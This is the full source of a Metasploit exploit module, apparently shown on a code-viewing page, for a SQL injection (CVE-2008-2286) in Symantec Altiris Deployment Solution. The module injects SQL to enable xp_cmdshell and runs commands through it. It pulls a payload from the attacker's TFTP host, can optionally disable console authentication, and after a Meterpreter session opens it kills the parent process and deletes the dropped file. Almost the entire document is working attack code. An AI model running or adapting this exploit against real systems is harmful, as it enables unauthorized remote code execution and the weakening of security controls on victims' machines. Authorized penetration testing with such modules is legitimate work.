Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::CmdStager
10
  include Msf::Exploit::Remote::Tcp
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Symantec Altiris DS SQL Injection',
17
        'Description' => %q{
18
          This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8
19
          to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize
20
          numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell,
21
          several SQL injections are required in close succession, first to enable xp_cmdshell, then
22
          retrieve the payload via TFTP and finally execute it. The module also has the capability
23
          to disable or enable local application authentication. In order to work the target system
24
          must have a tftp client available.
25
        },
26
        'Author' => [
27
          'Brett Moore', # Vulnerability discovery
28
          '3v0lver' # Metasploit module
29
        ],
30
        'License' => MSF_LICENSE,
31
        'References' => [
32
          [ 'CVE', '2008-2286' ],
33
          [ 'OSVDB', '45313' ],
34
          [ 'BID', '29198'],
35
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-024' ]
36
        ],
37
        'DefaultOptions' => {
38
          'EXITFUNC' => 'process',
39
        },
40
        'Targets' => [
41
          [
42
            'Windows 2003 (with tftp client available)',
43
            {
44
              'Arch' => ARCH_X86,
45
              'Platform' => 'win'
46
            }
47
          ]
48
        ],
49
        'Privileged' => true,
50
        'Platform' => 'win',
51
        'DisclosureDate' => '2008-05-15',
52
        'DefaultTarget' => 0,
53
        'Compat' => {
54
          'Meterpreter' => {
55
            'Commands' => %w[
56
              stdapi_fs_delete_file
57
              stdapi_sys_config_getenv
58
              stdapi_sys_process_attach
59
              stdapi_sys_process_get_processes
60
              stdapi_sys_process_kill
61
            ]
62
          }
63
        }
64
      )
65
     )
66

67
    register_options(
68
      [
69
        Opt::RPORT(402),
70
        OptBool.new('XP_CMDSHELL', [ true, "Enable xp_cmdshell prior to exploit", true]),
71
        OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
72
        OptBool.new('ENABLE_SECURITY', [ true, "Enable Local Deployment Console Authentication", false ])
73
      ]
74
    )
75
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
76

77
    self.needs_cleanup = true
78
  end
79

80
  def execute_command(cmd, opts = {})
81
    inject = []
82

83
    if @xp_shell_enable
84
      inject += [
85
        "#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure", '')}",
86
        "#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure", '')}",
87
      ]
88
      @xp_shell_enable = false
89
    end
90

91
    if @wc_disable_security
92
      inject += ["#{Rex::Text.to_hex("wc_upd_disable_security", '')}"]
93
      @wc_disable_security = false
94
    end
95

96
    if @wc_enable_security
97
      inject += ["#{Rex::Text.to_hex("wc_upd_enable_security", '')}"]
98
      @wc_enable_security = false
99
    end
100

101
    inject += ["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd %TEMP% && cmd.exe /c #{cmd}\'", '')}"] if cmd != nil
102

103
    inject.each do |sqli|
104
      send_update_computer("2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--")
105
    end
106
  end
107

108
  def send_update_computer(processor_speed)
109
    notification = %Q|Request=UpdateComputer
110
OS-Bit=32
111
CPU-Arch=x86
112
IP-Address=192.168.20.107
113
MAC-Address=005056C000AB
114
Name=Remove_test
115
OS=Windows XP
116
Version=2.6-38 (32-Bit)
117
LoggedIn=Yes
118
Boot-Env=Automation
119
Platform=Linux
120
Agent-Settings=Same
121
Sys-Info-TimeZoneBias=0
122
Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
123
Processor-Speed=#{processor_speed}
124
   \x00
125
   |
126

127
    connect
128
    sock.put(notification)
129
    response = sock.get_once()
130
    disconnect
131

132
    return response
133
  end
134

135
  def check
136
    res = send_update_computer("2659")
137

138
    unless res and res =~ /Result=Success/ and res =~ /DSVersion=(.*)/
139
      return Exploit::CheckCode::Unknown
140
    end
141

142
    version = $1
143

144
    unless version =~ /^6\.(\d+)\.(\d+)$/
145
      return Exploit::CheckCode::Safe
146
    end
147

148
    vprint_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'"
149

150
    minor = $1.to_i
151
    build = $2.to_i
152

153
    if minor == 8
154
      if build == 206 || build == 282 || build == 378
155
        return Exploit::CheckCode::Appears
156
      elsif build < 390
157
        return Exploit::CheckCode::Appears
158
      end
159
    elsif minor == 9 and build < 176
160
      # The existence of versions matching this profile is a possibility... none were observed in the wild though
161
      # as such, we're basing confidence off of Symantec's vulnerability bulletin.
162
      return Exploit::CheckCode::Appears
163
    end
164

165
    return Exploit::CheckCode::Safe
166
  end
167

168
  def exploit
169
    @wc_disable_security = datastore['DISABLE_SECURITY']
170
    @wc_enable_security = datastore['ENABLE_SECURITY']
171
    @xp_shell_enable = datastore['XP_CMDSHELL']
172

173
    # CmdStagerVBS was tested here as well, however delivery took roughly
174
    # 30 minutes and required sending almost 350 notification messages.
175
    # size constraint requirement for SQLi is: linemax => 393
176
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
177
    execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp })
178
  end
179

180
  def on_new_session(client)
181
    return if not stager_instance.payload_exe
182

183
    # can't scrub dropped payload while the process is still active so...
184
    # iterate through process list, find our process and the associated
185
    # parent process ID, Kill the parent.
186
    # This module doesn't use FileDropper because of timing issues when
187
    # using migrate -f and FileDropper. On the other hand PrependMigrate
188
    # has been avoided because of older issues with reverse_https payload
189

190
    unless client.type == "meterpreter"
191
      print_error("Automatic cleanup only available with meterpreter, please delete #{stager_instance.payload_exe} manually")
192
      return
193
    end
194

195
    client.core.use("stdapi") unless client.ext.aliases.include?("stdapi")
196
    # migrate
197
    print_status("Migrating ...")
198
    client.console.run_single("run migrate -f")
199
    # kill the parent process so the payload can hopefully be dropped
200
    print_status("Kill parent process ...")
201
    client.sys.process.get_processes().each do |proc|
202
      if proc['pid'] == client.sys.process.open.pid
203
        client.sys.process.kill(proc['ppid'])
204
      end
205
    end
206

207
    win_temp = client.sys.config.getenv('TEMP')
208
    win_file = "#{win_temp}\\#{stager_instance.payload_exe}"
209
    print_status("Attempting to delete #{win_file} ...")
210
    client.shell_command_token(%Q|attrib.exe -r #{win_file}|)
211
    client.fs.file.rm(win_file)
212
    print_good("Deleted #{win_file}")
213
  end
214
end
215

216